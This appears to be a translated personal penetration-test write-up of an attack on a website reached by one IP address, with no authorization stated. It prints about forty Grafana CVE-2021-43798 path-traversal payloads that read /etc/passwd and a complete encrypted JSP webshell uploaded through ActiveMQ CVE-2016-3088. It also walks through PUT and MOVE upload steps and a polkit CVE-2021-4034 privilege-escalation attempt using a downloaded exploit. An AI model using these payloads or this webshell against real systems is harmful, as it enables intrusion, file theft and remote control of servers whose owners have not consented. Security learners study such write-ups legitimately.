A penetration test practice

foreword

After studying security for a month or two, in order to make a summary of one of my learning levels, I specially found a website to conduct an actual penetration battle.

collect message

This time the website has only one ip address, but it is found that accessing this ip address directly returns the connection timeout and cannot be accessed.

So at this time, we need to collect information to find the website related to the ip and conduct a penetration test.
Usually the first step of information collection is to collect subdomain names, but since the website I tested this time is directly a real ip, I just searched whether this ip has relevant ports to develop and use it.

Usually, port scanning is performed by using nmap , but I use fofa directly for asset collection.

Through fofa collection, I found that the ports on this ip have the following ports open: 3000, 8888, 8161, 9200, 8080, 8001 six ports.
Through testing, it is found that only three ports 3000, 8888, and 8161 can be accessed normally, so we can start with these three ports.
The access content of these three ports is as follows:
3000 port

8888 port

8161 port

After collecting their ports, I first use the dirsearchbackground scanning tool to scan these three websites to see if there are any sensitive files.

After scanning, 3 suspicious and sensitive files were found on port 8888

After scanning, 6 suspicious and sensitive files were found on port 3000

After scanning, it is found that there are 3 suspicious and sensitive files on port 8161.


After scanning the background, we can check the content of the webpage and find that the 3 websites are websites built with 3 different middleware, so we can check the website version and check this version online. Are there any vulnerabilities that can be exploited.
After Baidu found out that
the version below the Grafana website on port 3000 is 8.2.5, it is very likely that there is an arbitrary file reading vulnerability.

By entering the wrong file directory, we found that the version of nginx that can obtain port 8888 is 1.21.5.

After Baidu, we found that there is no vulnerability in this version.
The homepage of the apache website on port 8161 does not find the website version, but there is a login interface, we may try to bypass it by using methods such as dictionary blasting.

Vulnerability verification

First of all, a test is performed on the files scanned in the background above, and it is found that there are no files that can be exploited on
port 3000

, so it can only be tested from the relevant version vulnerabilities.

Only one 302 redirect page prompt was found by testing port 8161

I found that there is no place to use it for the time being, so I can only try to log in to the background to start.

After testing the 8888 port, I found that the compressed package www.root.7z

was downloaded and opened and found that this is obviously a base64 encoding, so we need to decode


it. By getting an account and password here, I immediately thought whether I could log in. Go to the apache website
and find that you can log in to the apache website.

After logging in, it tells us the version of apache, so we can go to find the relevant vulnerabilities of this version for verification.
Through Baidu, we found that this version may have any file upload vulnerability.

exploit

Grafana Arbitrary File Read Vulnerability (CVE-2021-43798)

1. Vulnerability description

Grafana is a cross-platform, open source data visualization web application platform. After the user configures the connected data source, Grafana can display data graphs and alerts in a web browser.

2. Scope of Vulnerability

Affected Versions:
Grafana 8.0.0 - 8.3.0

Security Versions:
Grafana 8.3.1, 8.2.7, 8.1.8, 8.0.7

Payload：

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

Attack through burpsuit packet capture modification

You can verify the POC in batches through scripts and

finally find the flag

ActiveMQ Arbitrary File Upload Vulnerability (CVE-2016-3088)

1. Vulnerability description

The vulnerability appears in the fileserver application. The principle of the vulnerability: The fileserver service in ActiveMQ allows users to upload files to a specified directory through the HTTP PUT method. Fileserver supports writing files (does not parse jsp), but supports moving files (Move). We can PUT the jsp file to Fileserver, and then move it to the executable directory to access it through the Move command.

2. Scope of Vulnerability

Apache ActiveMQ 5.0.0 - 5.13.2

3. Vulnerability Exploitation:

There are several ways to use file writing:

1. Write webshell
2. Write cron or ssh key and other files
3. Write jar or jetty.xml and other libraries and configuration files
The advantage of writing webshell is that the threshold is low and convenient, but the fileserver does not parse jsp, admin and api Every application needs to be logged in to access, so it is a bit tasteless. The advantage of writing cron and ssh key is to directly bounce back to get the shell, which is also more convenient. xml configuration file, this method is more reliable, but a tasteless point is that we need the absolute path of activemq.

write to webshell

EXP：

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:directive.page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"/><jsp:declaration> class U extends ClassLoader{
    
    U(ClassLoader c){
    
    super(c);}public Class g(byte []b){
    
    return super.defineClass(b,0,b.length);}}</jsp:declaration><jsp:scriptlet>String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);</jsp:scriptlet></jsp:root>

Writing to the webshell needs to be written in the admin or api application, both of which require login to access. We have logged in before, access admin/test/systemProperties.jspcan view the absolute path of ActiveMQ

and then construct a PUT request through burpsuit packet capture. When the 204 status code is returned, the file upload is successful. The

access fileserver/shell.jspwill display the shell we wrote, as shown in the following figure

MOVE Request, move the file to /admin/, let the script parse it, and display 204 indicating that the upload is successful

. After uploading, use burpsuit to grab the request header of the GET packet.

Use ice scorpion to connect to the webshell.



After connecting, use the lscommand to view the current directory file, You can find CVE-2021-4034some . Through the whoamiand idcommand, it is found that only user permission is not root permission
. Baidu found that CVE-2021-4034 is a permission escalation vulnerability, so we can try to use this vulnerability to escalate permissions.

Privilege escalation

CVE-2021-4034 Linux polkit Escalation of Privilege Vulnerability

1. Vulnerability description

Polkit controls permissions at the system level, providing a system for low-priority processes to communicate with high-priority processes. Unlike programs such as sudo, Polkit doesn't give processes full root privileges, but rather finer-grained authorization through a centralized policy system.

2. The affected version

At present, there is no detailed affected version range listed on the CVE official website. Just upgrade to the latest version. The current latest version polkit-0.112-26.el7_9.1

3. Vulnerability Exploitation

1. Download EXP, address: https://github.com/berdav/CVE-2021-4034
2. Make and compile directly in the downloaded folder
3. Execute ./cve-2021-4034
4. Successfully
escalated rights

However, when I was using the ice scorpion, I found that the EXP in the directory was incomplete and could not be exploited, and the gcc command was not installed, but the installation of related commands required root privileges, so it was impossible to upgrade to root privileges. No other method has been found for privilege escalation. If a method is found in the future, it will be updated again.

Summarize

Through the actual combat experience of this penetration test, I have improved my thoughts on information collection and vulnerability exploitation, but I have learned relatively little in terms of privilege promotion and intranet penetration, and I still need to continue to learn.

References
ActiveMQ Arbitrary File Upload Vulnerability (CVE-2016-3088) .
CVE-2021-4034 Linux polkit Privilege Escalation Vulnerability Reproduction and Fix .
Grafana Arbitrary File Read Vulnerability (CVE-2021-43798) .